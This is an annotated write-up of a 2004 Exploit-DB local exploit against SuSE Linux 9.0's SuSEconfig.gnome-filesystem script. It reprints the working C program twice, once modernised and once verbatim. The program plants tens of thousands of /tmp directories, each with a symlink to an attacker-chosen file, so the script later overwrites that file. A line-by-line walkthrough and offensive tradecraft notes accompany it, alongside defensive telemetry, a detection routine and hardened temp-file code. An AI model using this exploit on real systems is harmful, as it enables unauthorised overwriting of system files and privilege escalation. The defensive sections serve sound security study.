Exploiting SuSE Linux 9.0 YaST Configuration Script Vulnerability

What this paper is
This paper details a local privilege escalation vulnerability in SuSE Linux 9.0. Specifically, it targets the SuSEconfig.gnome-filesystem script, which is part of the YaST (Yet Another Setup Tool) configuration system. The vulnerability allows a local attacker to create or overwrite arbitrary files by pre-creating the script's temporary directories in /tmp and planting symbolic links inside them.
Simple technical breakdown
The exploit works by creating a large number of directories in /tmp whose names follow the pattern the SuSEconfig.gnome-filesystem script uses for its own temporary directories. Inside each of them it creates a symbolic link named found that points at the file the attacker wants to overwrite. When the script later runs and processes one of these directories, it does not notice that the entry it writes to is a symbolic link (whether through a race condition or simply through unchecked handling of symlinks), so the write lands on the attacker's chosen file instead.
The exploit code itself only sets up the directories and links. The overwrite happens later, when the vulnerable script is executed, whether manually or by the system, and follows one of the planted links to the target file named by the attacker.
Complete code and payload walkthrough
Let's break down the provided C code:
#include <stdio.h>
#include <stdlib.h>     /* exit(); not included in the original, modern compilers require it */
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>   /* mkdir(); not included in the original */

#define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."
#define START 1
#define END 33000

int main(int argc, char **argv)
{
    int i;
    char buf[150];

    printf("\tSuSE 9.0 YaST script SuSEconfig.gnome-filesystem exploit\n");
    printf("\t-------------------------------------------------------------\n");
    printf("\tdiscovered and written by l0om <l0om excluded org>\n");
    printf("\t WWW.EXCLUDED.ORG\n\n");

    if(argc != 2) {
        printf("usage: %s <destination-file>\n",argv[0]);
        exit(0xff);
    }

    printf("### hit enter to create or overwrite file %s: ",argv[1]); fflush(stdout);
    /* wait for Enter. The original reads descriptor 1 (stdout), which only works
       because both descriptors are the same tty; fflush(stdin) is undefined behaviour. */
    read(0, buf, 1); fflush(stdin);
    umask(0000);                 /* directories really get the 0777 requested below */
    printf("working\n\n");

    /* pre-create every directory name the script may pick, each holding a
       symlink named "found" that points at the file to be overwritten */
    for(i = START; i < END; i++) {
        snprintf(buf, sizeof(buf),"%s%d",PATH,i);
        if(mkdir(buf,00777) == -1) {
            fprintf(stderr, "cannot creat directory [Nr.%d]\n",i);
            exit(0xff);
        }
        if(!(i%1000))printf(".");    /* progress dot every 1000 directories */
        strcat(buf, "/found");
        if(symlink(argv[1], buf) == -1) {
            fprintf(stderr, "cannot creat symlink from %s to %s [Nr.%d]\n",buf,argv[1],i);
            exit(0xff);
        }
    }
    printf("\ndone!\n");
    printf("next time the SuSE.gnome-filesystem script gets executed\n");
    printf("we will create or overwrite file %s\n",argv[1]);
    return(0x00);
} /* i cant wait for the new gobbles comic!! */
Code Fragment/Block -> Practical Purpose
- #include <stdio.h>, #include <unistd.h>, #include <string.h>: Standard C headers for input/output, POSIX system calls, and string handling. The original omits <stdlib.h> (for exit) and <sys/stat.h> (for mkdir); compilers of the time accepted the implicit declarations, modern ones reject them.
- #define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem.": Prefix for the directories to be created, chosen to match the naming convention of the temporary files the SuSEconfig.gnome-filesystem script generates.
- #define START 1, #define END 33000: The range of numbers appended to PATH. The exploit aims to create 33,000 directories (strictly, the loop stops before END, so it creates 32,999).
- int main(int argc, char **argv): Program entry point. argc is the argument count and argv the array of argument strings.
- int i; char buf[150];: The loop counter and a 150-byte buffer used to build file paths.
- printf(...): Banner lines naming the exploit, its author and website.
- if(argc != 2): Requires exactly one command-line argument. Otherwise it prints a usage message and exits with error code 0xff (255 in decimal).
  Purpose: ensures the user names the file to be overwritten.
- printf("### hit enter to create or overwrite file %s: ",argv[1]); fflush(stdout);: Prompts for confirmation, showing the target path (argv[1]). fflush(stdout) makes the prompt appear before the program blocks on input.
- read(1, buf, 1); fflush(stdin);: Waits for one byte of input so the user has to press Enter. Note that file descriptor 1 is standard output, not standard input (descriptor 0); on an interactive terminal both descriptors refer to the same tty, so the read works by accident. fflush(stdin) is meant to clear the input buffer, but it is undefined behaviour in standard C and its effect is platform-dependent.
  Purpose: user confirmation before a potentially destructive action.
- umask(0000);: Clears the file mode creation mask, so newly created directories get the full 0777 (and files 0666) requested, readable, writable and searchable by every user.
  Purpose: gives the created directories and symlinks the broadest possible permissions, which the exploit relies on.
- printf("working\n\n");: Announces the start of the main loop.
- for(i = START; i < END; i++): The core loop, from START (1) up to but not including END (33000).
- snprintf(buf, sizeof(buf),"%s%d",PATH,i);: Builds the directory path by appending the counter to PATH; snprintf bounds the write to the buffer size, preventing overflow.
  Purpose: unique names such as /tmp/tmp.SuSEconfig.gnome-filesystem.1, /tmp/tmp.SuSEconfig.gnome-filesystem.2 and so on.
- if(mkdir(buf,00777) == -1): Creates the directory named by buf with mode 00777 (read, write, execute for owner, group and others). If mkdir fails (returns -1), an error message is printed and the program exits.
  Purpose: creates the temporary directories. The 00777 mode is crucial for the exploit's success.
- if(!(i%1000))printf(".");: Prints a dot every 1000 iterations so the user can see the exploit is still making progress.
  Purpose: progress indicator.
- strcat(buf, "/found");: Appends /found, so buf now holds a path like /tmp/tmp.SuSEconfig.gnome-filesystem.1/found.
  Purpose: prepares the path for the symbolic link.
- if(symlink(argv[1], buf) == -1): Creates a symbolic link. argv[1] is the link target (the file the attacker wants to overwrite) and buf is the name of the link being created (e.g. /tmp/tmp.SuSEconfig.gnome-filesystem.1/found). If symlink fails, an error message is printed and the program exits.
  Purpose: creates the symbolic link. This is the core of the exploit mechanism: the SuSEconfig.gnome-filesystem script will eventually write through one of these links.
- printf("\ndone!\n");: Reports that directory and symlink creation is complete.
- printf("next time the SuSE.gnome-filesystem script gets executed\n"); printf("we will create or overwrite file %s\n",argv[1]);: States the consequence: the next run of the vulnerable script creates or overwrites the file argv[1].
- return(0x00);: Normal exit.
- /* i cant wait for the new gobbles comic!! */: A comment from the author, unrelated to the exploit logic.
Payload/Shellcode Segment Explanation:
There is no explicit shellcode or payload bytes in this C code. The "payload" in this context is the effect of the exploit: the creation of the temporary directories and symbolic links. The actual code that performs the file overwrite is the vulnerable SuSEconfig.gnome-filesystem script itself, which is not provided here but is implied to be present on the target system. The C program acts as a "preparer" for the exploit, setting up the conditions for the vulnerable script to be triggered.
Practical details for offensive operations teams
- Required Access Level: Local user access. This is a local privilege escalation exploit, meaning the attacker must already have an account on the target system.
- Lab Preconditions:
  - A SuSE Linux 9.0 system (or a system with a vulnerable version of the SuSEconfig.gnome-filesystem script).
  - The SuSEconfig.gnome-filesystem script must be present and executable.
  - The user must have write permissions in /tmp.
  - The target file (argv[1]) must exist or be creatable by the user, and the attacker must know its path.
- Tooling Assumptions:
  - A C compiler (like GCC) to compile the exploit code on the target system or cross-compile it.
  - Only the standard C library and POSIX system calls (printf, read, snprintf, mkdir, symlink, umask, exit); no external command-line utilities are needed.
- Execution Pitfalls:
  - Race Condition: The exploit relies on the vulnerable script being executed after the attacker has set up the symbolic links. If the vulnerable script is run before the exploit completes, or if the script is not run at all, the exploit will not succeed.
  - Temporary File Cleanup: If the system or other processes clean up temporary files in /tmp aggressively, the attacker's created directories and symlinks might be removed before the vulnerable script is executed.
  - Script Execution Trigger: The attacker needs a way to ensure the SuSEconfig.gnome-filesystem script is executed. This might involve waiting for a system event, triggering a service restart, or manually running the script if they have sufficient privileges to do so.
  - Target File Permissions: The attacker needs to ensure the target file (argv[1]) is one that the SuSEconfig.gnome-filesystem script has permission to overwrite. If the script runs as a low-privileged user, it can only overwrite files that user can modify. If the script runs as root, the attacker can overwrite critical system files.
  - Path Length Limits: While buf is 150 bytes, the total path length created by PATH + i + /found could potentially exceed filesystem limits on very old systems, though this is unlikely with these values.
  - Resource Limits: Creating 33,000 directories might hit filesystem limits on the number of entries in a directory or inode limits, though /tmp is usually a good candidate for this.
- Tradecraft Considerations:
  - Stealth: Running this exploit might generate significant disk I/O and create many files in /tmp, which could be detected by system monitoring.
  - Timing: The attacker needs to time the execution of the exploit preparation with the execution of the vulnerable script.
  - Payload Delivery: The C code is the "delivery mechanism" for the exploit's setup. The actual "payload" (e.g., a reverse shell, a command execution) would be what the attacker aims to achieve by overwriting a critical configuration file or executable.
- Expected Telemetry:
  - Creation of numerous directories in /tmp matching the PATH pattern.
  - Creation of numerous symbolic links within these directories.
  - Increased disk I/O activity.
  - Execution of the SuSEconfig.gnome-filesystem script.
  - Modification or creation of the target file specified by argv[1].
  - Potential error messages if mkdir or symlink fail.
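A detection check for the first two telemetry items, added here as an example and not part of the original paper: it walks a directory, counts subdirectories carrying the exploit's name prefix that contain a symbolic link named found, and exercises itself on a constructed throwaway directory. The prefix is the one the page's code uses; the function names and the self-check paths are assumptions of this example.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define PREFIX "tmp.SuSEconfig.gnome-filesystem."
/* Count subdirectories of base that carry the exploit's name prefix and hold a
 * symlink named "found" (lstat() sees the link itself, never its target). A few
 * may be script residue; about 33,000 means a planted symlink farm. -1 on error. */
int count_planted_dirs(const char *base)
{
    struct dirent *e; struct stat st; char path[4096]; int hits = 0;
    DIR *d = opendir(base);
    if (d == NULL) return -1;
    while ((e = readdir(d)) != NULL) {
        if (strncmp(e->d_name, PREFIX, strlen(PREFIX)) != 0) continue;
        snprintf(path, sizeof path, "%s/%s/found", base, e->d_name);
        if (lstat(path, &st) == 0 && S_ISLNK(st.st_mode)) hits++;
    }
    closedir(d);
    return hits;
}

/* Self-check on constructed data: a throwaway base holding three planted
 * dirs plus one unrelated dir, scanned and then removed. Returns the count. */
int selfcheck_constructed(void)
{
    char base[] = "/tmp/symlink-farm-check-XXXXXX", dir[4096], link[4096];
    int i, hits;
    if (mkdtemp(base) == NULL) return -1;
    for (i = 1; i <= 3; i++) {
        snprintf(dir, sizeof dir, "%s/%s%d", base, PREFIX, i);
        snprintf(link, sizeof link, "%s/found", dir);
        mkdir(dir, 0700);
        if (symlink("/tmp/constructed-target", link) != 0) return -1; /* dangling is fine */
    }
    snprintf(dir, sizeof dir, "%s/unrelated.d", base);
    mkdir(dir, 0700);                                /* wrong prefix: must not count */
    hits = count_planted_dirs(base);
    rmdir(dir);
    for (i = 1; i <= 3; i++) {
        snprintf(dir, sizeof dir, "%s/%s%d", base, PREFIX, i);
        snprintf(link, sizeof link, "%s/found", dir);
        unlink(link); rmdir(dir);
    }
    rmdir(base);
    return hits;
}
```

Pointing count_planted_dirs at /tmp on a live host gives the number of planted directories currently present; the self-check returns 3.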
Where this was used and when
- Context: This exploit targets a specific configuration script within the YaST framework on SuSE Linux 9.0. YaST is a comprehensive system configuration tool. The vulnerability likely arises from how this script handles temporary files and symbolic links during its operation, possibly during system updates, package installations, or configuration changes related to GNOME filesystem integration.
- Approximate Year/Date: The exploit was published on January 15, 2004. Therefore, its practical use would have been around this time, targeting SuSE Linux 9.0 systems which were current or recently current around 2004.
Defensive lessons for modern teams
- Secure Temporary File Handling: Always use secure methods for creating and managing temporary files and directories. Avoid predictable naming patterns. Use functions like mkstemp or mkdtemp, which create temporary files/directories with unique, secure names and set appropriate permissions.
- Symbolic Link Security: Be extremely cautious when processing symbolic links, especially in scripts that run with elevated privileges. Validate the target of a symbolic link to ensure it points to an expected and safe location. Avoid following symbolic links into untrusted directories.
- Race Condition Mitigation: Design systems to avoid race conditions. If temporary resources are needed, ensure they are created and used atomically or with proper locking mechanisms.
- Principle of Least Privilege: Scripts and applications should run with the minimum privileges necessary to perform their function. If SuSEconfig.gnome-filesystem didn't need root privileges to overwrite arbitrary files, this vulnerability would be less severe.
- Regular Patching and Updates: Keep operating systems and all installed software up-to-date with security patches. This vulnerability was specific to an older version of SuSE Linux.
- Input Validation: Validate all inputs, especially those that control file operations or paths.
- Auditing and Monitoring: Implement robust auditing and monitoring to detect suspicious file creation, modification, and script execution patterns, particularly in sensitive directories like /tmp.
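The first two lessons in code, as an added example that is not part of the original paper nor of the SuSE script: a C routine that creates its work directory with mkdtemp() and then creates a file inside it with O_CREAT|O_EXCL|O_NOFOLLOW, so a symlink planted at the expected name is refused instead of followed. The directory prefix is reused from the page; the planted link's target and all function names are constructed for the demonstration.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create dir/name for writing without following a symlink: O_CREAT|O_EXCL
 * fails on any pre-existing entry, a symlink included (errno EEXIST);
 * O_NOFOLLOW refuses a symlink at the last component (ELOOP); fstat() on
 * the open descriptor confirms a regular file. Returns an fd, or -1 with errno. */
int create_file_nofollow(const char *dir, const char *name)
{
    char path[4096];
    struct stat st;
    int fd;
    if (snprintf(path, sizeof path, "%s/%s", dir, name) >= (int)sizeof path) {
        errno = ENAMETOOLONG;
        return -1;
    }
    fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd >= 0 && (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode))) {
        close(fd);
        errno = EINVAL;
        return -1;
    }
    return fd;
}

/* Demo: make the work directory the safe way, plant dir/found as a symlink
 * the way the exploit does (constructed; the target need not exist) and
 * check that the hardened create refuses it.
 * Returns 1 if refused, 0 if the symlink was followed, -1 on setup error. */
int planted_symlink_is_refused(void)
{
    /* mkdtemp() randomises XXXXXX and creates the directory mode 0700, so
     * another local user can neither guess the name nor pre-create it. */
    char dir[] = "/tmp/tmp.SuSEconfig.gnome-filesystem.XXXXXX";
    char link[160]; int fd, refused;
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(link, sizeof link, "%s/found", dir);
    if (symlink("/tmp/constructed-nonexistent-target", link) != 0) return -1;
    fd = create_file_nofollow(dir, "found");
    refused = fd < 0 && (errno == EEXIST || errno == ELOOP);
    if (fd >= 0) close(fd);
    unlink(link);
    rmdir(dir);
    return refused;
}
```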
ASCII visual (if applicable)
This exploit involves a sequence of actions rather than a complex architecture. A simple flow diagram can illustrate the process:
+-----------------+     +-------------------+     +-----------------------+
| Attacker's      | --> | Exploit C Program | --> | Target File (argv[1]) |
| Local User      |     | (Runs on Target)  |     +-----------------------+
+-----------------+     +-------------------+
                                  |
                                  | Creates many temporary directories
                                  | and symbolic links in /tmp
                                  | (e.g., /tmp/tmp.SuSEconfig.gnome-filesystem.N/found -> argv[1])
                                  v
                        +-------------------------+
                        | SuSEconfig.gnome-       |
                        | filesystem Script       |
                        | (Vulnerable)            |
                        +-------------------------+
                                  |
                                  | Processes temp dirs/symlinks
                                  | (Race condition/improper handling)
                                  v
                        +-------------------------+
                        | Overwrites Target File  |
                        | (argv[1])               |
                        +-------------------------+
Source references
- Paper ID: 144
- Paper Title: SuSE Linux 9.0 - YaST Configuration Skribt Overwrite Files
- Author: l0om
- Published: 2004-01-15
- Keywords: Linux, local
- Paper URL: https://www.exploit-db.com/papers/144
- Raw URL: https://www.exploit-db.com/raw/144
Original Exploit-DB Content (Verbatim)
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."
#define START 1
#define END 33000
int main(int argc, char **argv)
{
    int i;
    char buf[150];
    printf("\tSuSE 9.0 YaST script SuSEconfig.gnome-filesystem exploit\n");
    printf("\t-------------------------------------------------------------\n");
    printf("\tdiscovered and written by l0om <l0om excluded org>\n");
    printf("\t WWW.EXCLUDED.ORG\n\n");
    if(argc != 2) {
        printf("usage: %s <destination-file>\n",argv[0]);
        exit(0xff);
    }
    printf("### hit enter to create or overwrite file %s: ",argv[1]); fflush(stdout);
    read(1, buf, 1); fflush(stdin);
    umask(0000);
    printf("working\n\n");
    for(i = START; i < END; i++) {
        snprintf(buf, sizeof(buf),"%s%d",PATH,i);
        if(mkdir(buf,00777) == -1) {
            fprintf(stderr, "cannot creat directory [Nr.%d]\n",i);
            exit(0xff);
        }
        if(!(i%1000))printf(".");
        strcat(buf, "/found");
        if(symlink(argv[1], buf) == -1) {
            fprintf(stderr, "cannot creat symlink from %s to %s [Nr.%d]\n",buf,argv[1],i);
            exit(0xff);
        }
    }
    printf("\ndone!\n");
    printf("next time the SuSE.gnome-filesystem script gets executed\n");
    printf("we will create or overwrite file %s\n",argv[1]);
    return(0x00);
} /* i cant wait for the new gobbles comic!! */
// milw0rm.com [2004-01-15]